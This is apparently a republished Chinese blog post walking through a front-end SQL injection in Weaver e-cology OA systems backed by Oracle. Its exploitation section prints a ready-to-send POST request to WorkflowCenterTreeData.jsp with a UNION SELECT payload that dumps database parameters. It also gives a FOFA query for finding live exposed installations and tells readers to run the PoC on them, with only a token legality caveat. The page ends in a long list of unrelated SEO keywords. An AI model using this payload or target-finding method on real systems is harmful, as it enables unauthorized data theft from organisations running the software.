e-cology OA前台SQL注入漏洞复现是怎样的
发表于:2025-12-03 作者:千家信息网编辑
千家信息网最后更新 2025年12月03日,这篇文章给大家介绍e-cology OA前台SQL注入漏洞复现是怎样的,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。0x00 简介e-cology 提供了移动办公、微信办公、协同
千家信息网最后更新 2025年12月03日e-cology OA前台SQL注入漏洞复现是怎样的
这篇文章给大家介绍e-cology OA前台SQL注入漏洞复现是怎样的,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。
0x00 简介
e-cology 提供了移动办公、微信办公、协同办公(OA)、流程管理、信息门户、知识管理、费控管理等功能,适用于手机和pc端,是当今比较主流的OA系统之一。
0x01 原理概述
该漏洞是由于OA系统的WorkflowCenterTreeData接口在收到用户输入的时候未进行安全过滤,oracle数据库传入恶意SQL语句,导致SQL漏洞。
0x02 影响范围
使用oracle数据库的泛微 e-cology OA 系统
0x03 环境搭建
在线环境(限今晚):
打赏(任意金额)+转发,联系作者获取
FOFA搜索:
app="泛微-协同办公OA"
自行搭建:
公众号内回复"泛微环境"
0x04 漏洞利用
找到oracle数据库的泛微OA系统后直接使用Poc(已公开)
如果不存在漏洞,则显示结果如下
如果漏洞存在,则会直接回显很多数据
简洁版Poc如下:(勿用于非法途径)
POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 2236Connection: closeUpgrade-Insecure-Requests: 1formids=11111111111)))%0a%0dunion select NULL,value from v$parameter order by (((1
0x05 修复建议
官网已更新补丁,请尽快更新。
关于e-cology OA前台SQL注入漏洞复现是怎样的就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
漏洞
数据
系统
办公
数据库
环境
前台
内容
更多
知识
帮助
更新
管理
不错
简洁
安全
主流
作者
信息
公众
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
互联网运维与网络安全
苏州 软件开发工程师
寄售数据库加载
服务器来访记录
网络安全电话会议纪要
坪山软件开发工资
东莞商城软件开发订制
定制网络技术咨询常见问题
华为手机云服务器占用空间
elog服务器
黎巴嫩 一带一路数据库
软件开发企业怎么进行会计核算
软件开发流程及设计
服务器内部结构介绍
中国引文数据库
网络安全信息安全 股票
服务器如何安全关机
百度地图的数据库
华为服务器 X722网卡设置
怎样转行软件开发
阿里云服务器怎么挂代理
有状态服务器
网络安全电信电力保障措施
道亨slw2d数据库
道闸系统控制软件开发
现在最好的网络安全手机
茂名市桓捷互联网科技
acc数据库追加表创建
常德软件开发中职学校
郑东新区 软件开发云